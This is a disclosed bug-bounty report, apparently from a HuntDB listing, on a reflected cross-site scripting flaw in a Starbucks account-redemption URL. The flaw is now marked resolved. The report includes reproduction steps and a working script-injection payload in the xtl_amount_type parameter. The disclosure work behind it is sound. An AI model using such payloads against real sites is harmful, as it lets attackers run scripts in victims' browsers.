Loading HuntDB...

Reflected XSS in https://www.starbucks.com/account/create/redeem/MCP131XSR via xtl_amount, xtl_coupon_code, xtl_amount_type parameters

Medium
S
Starbucks
Submitted None

Team Summary

Official summary from Starbucks

zayn1337 discovered that the endpoint at https://www.starbucks.com/account/create/redeem/MCP131XSR was vulnerable to a reflected cross-site scripting vulnerability. @zayn1337 — thank you for uncovering this vulnerability, your patience while we followed up on the issue and for confirming the resolution.

Reported by zayn1337

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
HI, **Summary:** Reflected XSS **Description:** the parameters are complementary to each other **Platform(s) Affected:** my browser firefox 52.7.3 ## Steps To Reproduce: 1. go to https://www.starbucks.com/account/create/redeem/MCP131XSR?xtl_coupon_code=1&xtl_coupon_code=81431&xtl_amount=0.0&xtl_amount_type=DOLLAR_VALUE 1. change parameter `xtl_amount_type` to </script><svg/onload=alert()>` >note:if you go enter this the payload not work but!!!!! you change `xtl_coupon_code` and `xtl_amount` payload will work 1. change `xtl_coupon_code` and `xtl_amount` to any think 1.payload be like https://www.starbucks.com/account/create/redeem/MCP131XSR?xtl_coupon_code=1&xtl_coupon_code=hkjhkjh&xtl_amount=jhkjhj&xtl_amount_type=ayn%3C/script%3E%3Csvg/onload=alert(document%2edomain)%3E ## Supporting Material/References: {F464214} ## How can the system be exploited with this bug? The attacker can execute JS code. ## How did you come across this bug ? change `xtl_coupon_code` and `xtl_amount` payload will work In this bug the parameters are complementary to each other ## Recommendations for fix In this bug the parameters are complementary to each other try to retreat ## Impact * The attacker can execute JS code.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected